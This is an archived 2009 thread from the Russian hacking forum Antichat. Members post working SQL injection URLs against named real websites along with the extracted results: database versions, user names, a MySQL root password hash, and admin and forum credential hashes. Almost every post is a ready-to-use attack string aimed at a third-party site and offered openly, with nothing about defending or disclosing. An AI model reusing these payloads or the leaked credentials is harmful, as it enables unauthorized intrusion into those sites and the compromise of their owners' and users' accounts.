ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8111  
Старый 02.03.2009, 21:32
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

www.poimai.ru pr-4 ТиЦ - 230
PHP код:
http://www.poimai.ru/catalog/oruzhie/ohotnich_i_nozhi/?id=12195+union+select+1,2,3,concat_ws(0x3A,user,password,host,file_priv),5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+--+&target=nw 
root@localhost:root:2fbdcd157a5fb159:localhost:Y
 
Ответить с цитированием

  #8112  
Старый 02.03.2009, 22:19
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://shintorgservis.ru/index.php?GID=1+union+select+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--
Database Version : 4.0.27-log
Database name : shintorg
User name : shintorg@zvm18.host.ru


----------------------------------------------------+

Код:
http://www.pilotmaster.ru/news.php?item_id=-1+union+select+1,2,version (),4,5,6--
Database Version : 5.0.67
Database name : pilotmaster
User name : pilotmaster@localhost
 
Ответить с цитированием

  #8113  
Старый 02.03.2009, 22:27
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.oxo.ro/index.php?action=levelbrowser&dir_id=-649+union+select+1,unhex(hex(concat_ws(0x3a,versio n(),database(),user()))),3,4--&SID=

Database Version: 4.1.9-standard
Database name: test1
User name: steph@localhost
 
Ответить с цитированием

  #8114  
Старый 02.03.2009, 22:59
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://metalmir.ru/articles/sn.php?id=-53+union+select+1,version(),3,4,5,6,7
тиц: 20
5.0.67-log

Код:
http://avtomatpro.info/articles/sn.php?id=-269+union+select+1,version(),3,4,5,6,7
тиц: 40
5.0.67-log

Код:
http://masteroff.ru/articles/sn.php?id=-120+union+select+1,version(),3,4,5,6,7
тиц: 40
5.0.67-log
 
Ответить с цитированием

  #8115  
Старый 02.03.2009, 23:26
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Klarnet CMS, вроде нигде не нашел этой уязвимости, хотя это трудно назвать какой то упорядоченой CMS, скорей Klarnet framework:
PHP код:
http://www.klarnet.ru/clients/projects/?spheres_id=1+union+select+concat(0x223e3c2f613e2d2d2d3e,table_name,0x3D3E,COLUMN_NAME,0x3c62723e3c613e3c212d2d2d2d),2,3,4+from+INFORMATION_SCHEMA.COLUMNS+where+table_schema+not+in+(0x696e666f726d6174696f6e5f736368656d61)/* 
 
Ответить с цитированием

  #8116  
Старый 02.03.2009, 23:39
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.lkw-neva.ru/?mode=news&id=-1+union+select+1,2,3,4,concat_ ws(0x3a,versi on(),database(),user()),6,7,8--
Database Version : 4.1.22-log
Database name : wwwlkwnevaru
User name : lkwneva@fe28.hc.ru


-------------------------------------------------------+

Код:
http://www.starcom-ru.ru/info.phtml?n_id=-1+union+select+1,2,3,4,concat_ ws(0x3a,version(),database( ),user()),6,7,8,9,10,11--&r_id=26
Database Version : 5.0.67-log
Database name : u35285
User name : u35285@10.10.10.226


админ :

Код:
http://www.starcom-ru.ru/info.phtml?n_id=-1+union+select+1,2,3,4,concat_ws(0x3a,login,password),6,7,8,9,10,11+from+adm _users+limit+0,1--&r_id=26
Код:
star:950e35a2244603c495d408e849d3e1cf
 
Ответить с цитированием

  #8117  
Старый 02.03.2009, 23:49
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://jfp.ru/articles/sn.php?id=-79+union+select+1,version(),3,4,5,6,7
5.0.67-log
 
Ответить с цитированием

  #8118  
Старый 03.03.2009, 03:13
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.ictctech.com/category.php?cat=-1003+union+select+1,version(),3,4,5,6,7,8,9,user() ,1,2,3,4,5,6,7,8/*

version():4.1.21
user():www-icavts@localhost
 
Ответить с цитированием

  #8119  
Старый 03.03.2009, 03:39
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.rimeks.ru/index.php?town=&id=1&page=news&subid=527&year=2009&id_news=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user()),5,6,7,8,9,10--
Database Version : 5.0.41-log
Database name : rimex
User name : rimex@troy.mplik.ru


юзвери :

Код:
http://www.rimeks.ru/index.php?town=&id=1&page=news&subid=527&year=2009&id_news=-1+union+select+1,2,3,concat_ws(0x3a,login,passwor d),5,6,7,8,9,10+from+login_base+limit+0,1--
админ с форума :

Код:
http://www.rimeks.ru/index.php?town=&id=1&page=news&subid=527&year=2009&id_news=-1+union+select+1,2,3,concat_ ws(0x3a,username,user_password),5,6,7,8,9,10+from+p hpbb_users+limit+1,1--
Код:
rimex:e1ab56facf1c794b1eae74b3ad162f13
-------------------------------------------------+

Lada Audio

Код:
http://www.lada-audio.ru/site/press.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),user()),6,7,8--
Database Version : 4.1.22-log
Database name : wwwladaaudioru
User name : ladaaudi@localhost
 
Ответить с цитированием

  #8120  
Старый 03.03.2009, 08:59
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

www.fresno-restaurants.org


Код:
http://www.fresno-restaurants.org/news.php?ax=v&n=7&id=7&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
version: 4.1.22-standard-log
user:fresnor2_user@localhost
database:fresnor2_cms




-------------------------------------------------------------



www.roadrageperformance.com


Код:
http://www.roadrageperformance.com/news.php?ax=v&n=17&id=7&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
version: 4.1.22-standard
user:roadrage_user@localhost
database:roadrage_cms
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ